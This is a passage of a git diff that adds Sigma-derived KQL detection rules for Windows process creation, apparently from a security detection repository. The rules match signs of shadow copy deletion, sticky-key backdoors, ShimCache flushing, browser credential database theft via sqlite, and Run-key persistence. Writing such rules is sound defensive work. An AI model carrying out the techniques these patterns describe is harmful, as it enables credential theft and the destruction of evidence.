+| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql
new file mode 100644
index 00000000..cf991af5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql
@@ -0,0 +1,14 @@
+// Title: Setup16.EXE Execution With Custom .Lst File
+// Author: frack113
+// Date: 2024-12-01
+// Level: medium
+// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
+// These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
+// Attackers and adversaries might leverage this as a living of the land utility.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005
+// False Positives:
+//   - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains " -m " and InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe") and (not(FolderPath startswith "C:\\~MSSETUP.T\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql
new file mode 100644
index 00000000..44af7700
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql
@@ -0,0 +1,12 @@
+// Title: Shadow Copies Creation Using Operating Systems Utilities
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: medium
+// Description: Shadow Copies creation using operating systems utilities, possible credential access
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003
+// False Positives:
+//   - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql
new file mode 100644
index 00000000..cc930614
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql
@@ -0,0 +1,13 @@
+// Title: Shadow Copies Deletion Using Operating Systems Utilities
+// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies deletion using operating systems utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490
+// False Positives:
+//   - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
+//   - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql
new file mode 100644
index 00000000..f7b92e5b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Share And Session Enumeration Using Net.EXE
+// Author: Endgame, JHasenbusch (ported for oscd.community)
+// Date: 2018-10-30
+// Level: low
+// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+//   - Legitimate use of net.exe utility by legitimate user
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql
new file mode 100644
index 00000000..a249e1da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql
@@ -0,0 +1,10 @@
+// Title: Shell32 DLL Execution in Suspicious Directory
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects shell32.dll executing a DLL in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql
new file mode 100644
index 00000000..25e4e948
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql
@@ -0,0 +1,13 @@
+// Title: Shell Process Spawned by Java.EXE
+// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
+// Date: 2021-12-17
+// Level: medium
+// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+//   - Legitimate calls to system binaries
+//   - Company specific internal usage
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shimcache_flush.kql b/KQL/rules/windows/process_creation/shimcache_flush.kql
new file mode 100644
index 00000000..c8409337
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shimcache_flush.kql
@@ -0,0 +1,10 @@
+// Title: ShimCache Flush
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-01
+// Level: high
+// Description: Detects actions that clear the local ShimCache and remove forensic evidence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql b/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql
new file mode 100644
index 00000000..c73d11dc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql
@@ -0,0 +1,13 @@
+// Title: SQL Client Tools PowerShell Session Detection
+// Author: Agro (@agro_sev) oscd.communitly
+// Date: 2020-10-13
+// Level: medium
+// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
+// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql
new file mode 100644
index 00000000..d706b07e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql
@@ -0,0 +1,10 @@
+// Title: SQLite Chromium Profile Data DB Access
+// Author: TropChaud
+// Date: 2022-12-19
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql
new file mode 100644
index 00000000..2c1b05c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql
@@ -0,0 +1,10 @@
+// Title: SQLite Firefox Profile Data DB Access
+// Author: frack113
+// Date: 2022-04-08
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql b/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql
new file mode 100644
index 00000000..a7af8e0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql
@@ -0,0 +1,12 @@
+// Title: Start of NT Virtual DOS Machine
+// Author: frack113
+// Date: 2022-07-16
+// Level: medium
+// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql
new file mode 100644
index 00000000..497aca43
--- /dev/null
+++ b/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Start Windows Service Via Net.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+// False Positives:
+//   - Legitimate administrator or user executes a service for legitimate reasons.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql b/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql
new file mode 100644
index 00000000..9b6355fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql
@@ -0,0 +1,12 @@
+// Title: Sticky Key Like Backdoor Execution
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql
new file mode 100644
index 00000000..32097d2e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via Net.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "net" utility.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+//   - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql
new file mode 100644
index 00000000..18221c55
--- /dev/null
+++ b/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via PowerShell Stop-Service
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+//   - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql
new file mode 100644
index 00000000..5f3b4964
--- /dev/null
+++ b/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via Sc.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "sc.exe" utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+//   - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspect_svchost_activity.kql b/KQL/rules/windows/process_creation/suspect_svchost_activity.kql
new file mode 100644
index 00000000..88b04fa2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspect_svchost_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspect Svchost Activity
+// Author: David Burkett, @signalblur
+// Date: 2019-12-28
+// Level: high
+// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+// False Positives:
+//   - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql
new file mode 100644
index 00000000..9b6a5b4e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: high
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql
new file mode 100644
index 00000000..d641f110
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Advpack Call Via Rundll32.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: high
+// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql
new file mode 100644
index 00000000..206aa4dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: high
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe" or (ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
new file mode 100644
index 00000000..5509bc32
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious ArcSOC.exe Child Process
+// Author: Micah Babinski
+// Date: 2025-11-25
+// Level: high
+// Description: Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.
+// ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS
+// Server system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding
+// service endpoint and remotely execute code from the ArcSOC.exe process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\ArcSOC.exe") and (not((ProcessCommandLine =~ "cmd.exe /c \"ver\"" and FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql
new file mode 100644
index 00000000..5f62d985
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Autorun Registry Modified via WMI
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-17
+// Level: high
+// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047
+// False Positives:
+//   - Legitimate administrative activity or software installations
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ")) and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or InitiatingProcessFolderPath endswith "\\wmiprvse.exe")) and ((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData'" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains ":\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming" or ProcessCommandLine contains ":\\$Recycle.bin" or ProcessCommandLine contains ":\\Users\\Default" or ProcessCommandLine contains ":\\Users\\public" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%AppData%") or (ProcessCommandLine contains ":\\Users\\" and (ProcessCommandLine contains "\\Favorites" or ProcessCommandLine contains "\\Favourites" or ProcessCommandLine contains "\\Contacts" or ProcessCommandLine contains "\\Music" or ProcessCommandLine contains "\\Pictures" or ProcessCommandLine contains "\\Documents" or ProcessCommandLine contains "\\Photos")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql
new file mode 100644
index 00000000..15ef6478
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Binary In User Directory Spawned From Office Application
+// Author: Jason Lynch
+// Date: 2019-04-02
+// Level: high
+// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
+
+DeviceProcessEvents
+| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql
new file mode 100644
index 00000000..a8b9d805
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious BitLocker Access Agent Update Utility Execution
+// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-18
+// Level: high
+// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.
+// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
